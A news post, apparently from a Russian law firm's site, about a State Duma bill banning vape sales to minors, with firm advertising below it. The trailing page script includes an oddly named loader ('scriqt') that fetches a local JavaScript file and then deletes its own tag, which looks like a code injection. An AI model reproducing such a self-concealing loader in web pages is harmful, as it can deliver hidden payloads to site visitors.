В ГД внесли законопроект о запрете продажи электронных сигарет подросткам.

В ГД внесли законопроект о запрете продажи электронных сигарет подросткам. В документе говорится, что воздействие жидкости, содержащейся внутри большинства испарителей, на организм человека до конца не изучено и никак не контролируется.
В Госдуму внесли законопроект, запрещающий продажу несовершеннолетним электронных устройств, имитирующих курение. Автором выступил замглавы комитета ГД по образованию и науке от ЛДПР Борис Чернышов.

— Проект закона предусматривает запрет на продажу вейпов несовершеннолетним, — пишет разработчик. В случае, если у продавца возникают сомнения в достижении покупателем совершеннолетия, он обязан потребовать у него документ, позволяющий установить возраст покупателя.

Парламентарий, выступивший с этой инициативой, указал, что "школьники, употребляющие испарители, в дальнейшем в четыре раза чаще становились заядлыми курильщиками, нежели их сверстники, не использовавшие вейпы".

#Боярцев_и_Партнеры #юристы #новости
Возврат к списку


У нас сотни выигранных дел – отзывы реальных клиентов это доказывают!

Работайте с профессионалами!

Звонки и заявки на консультацию принимаются круглосуточно.

Вы получите четкие и понятные консультации: «без воды» - только суть! С нашей помощью Вы обойдете сложные «ловушки и капканы» закона.

ФИО
Телефон
Текст сообщения
Это поле обязательно для заполнения
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');var scriqt=document.createElement('script');scriqt.src='/bitrix/js/main/core/core_loader.js?v=0.2.14';scriqt.onload=function(){document.head.removeChild(scriqt);};document.head.appendChild(scriqt); ga('create', 'UA-83802593-1', 'auto'); ga('send', 'pageview');